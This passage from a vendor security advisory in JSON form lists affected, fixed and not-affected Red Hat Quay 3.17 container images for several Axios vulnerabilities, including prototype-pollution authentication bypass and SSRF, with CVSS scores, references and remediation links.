            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
    },
    {
      "cve": "CVE-2026-42041",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:41.034289+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
        }
      ],
      "release_date": "2026-04-24T17:55:30.036000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
    },
    {
      "cve": "CVE-2026-42043",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-04-24T19:01:22.552379+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
